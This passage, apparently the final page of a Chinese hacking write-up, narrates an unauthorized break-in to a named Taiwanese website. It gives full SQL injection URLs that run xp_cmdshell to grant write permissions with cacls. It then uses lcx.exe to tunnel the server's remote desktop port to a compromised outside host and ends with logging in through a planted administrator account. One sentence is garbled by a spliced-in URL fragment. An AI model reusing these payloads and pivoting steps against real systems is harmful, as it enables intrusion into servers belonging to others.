CACLS只加参数/G后直接执行会出现一个是否执行的提示，因为我们在注入里不能键入确定，因此cacls往往没有执行。加入参数 /E /G后将不会出现提示而直接执行，但是参数 /E 的作用是编辑ACL而不替换已赋予的用户权限，而我们本身目录里已经包含了’everyone:R’的权限设置，所以执行后仍然是’everyone:R’。这种情况下，我们首先要用 /D 参数先把要赋权的用户拒绝访问，然后再执行赋权。

　　依次提交,

　　http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’cacls C:\Inetpub\wwwroot\web\newkuai\hack /e /d everyone’--

　　http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’cacls C:\Inetpub\wwwroot\web\newkuai\hack /e /g everyone:F’--

　　执行后成功把完全控制权限赋予了everyone，可以从图8和图9eb\newkuai\1.txt’--

　　里看到’hack’目录前后控制权限的变化，接着再用一句话小马提交数据的时候已经可以写入了(图10)

　　三.完完全全的入侵

　　相信每个爱好入侵的朋友都一样，喜欢渗透到底，当然我也不会例外。有了写入的权限加上SA，后面的入侵也变得顺利成章了。先是确认服务器终端服务有启动并且端口是3389，然后换上大马上传端口转发工具lcx.exe，准备将服务器的3389的端口转发出来，因为我没有公网IP，所以再把lcx上传到有公网IP的肉鸡上进行监听。简单说下LCX的转发原理和使用方法，首先在肉鸡上的命令行下执行lcx -listen 51 880 ，作用是把监听到的发往本机51端口的数据传送到本机的880端口，而在台湾站上要执行的命令格式是lcx -slave 肉鸡IP 51 本机IP 3389，意思是把本机的3389端口传送到指定肉鸡的51端口上，而我们只需要在肉鸡上用远程桌面连接本地的880(127.0.0.1:880)端口就可以登陆到台湾服务器上了。提交以下地址执行lcx，最后利用自己添加的管理员帐号成功登陆到台湾站上(图11)

　　http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’C:\Inetpub\wwwroot\web\newkuai\lcx.exe -slave 222.240.166.xxx 51 192.168.1.2 3389’--

上一页  [1] [2] [3]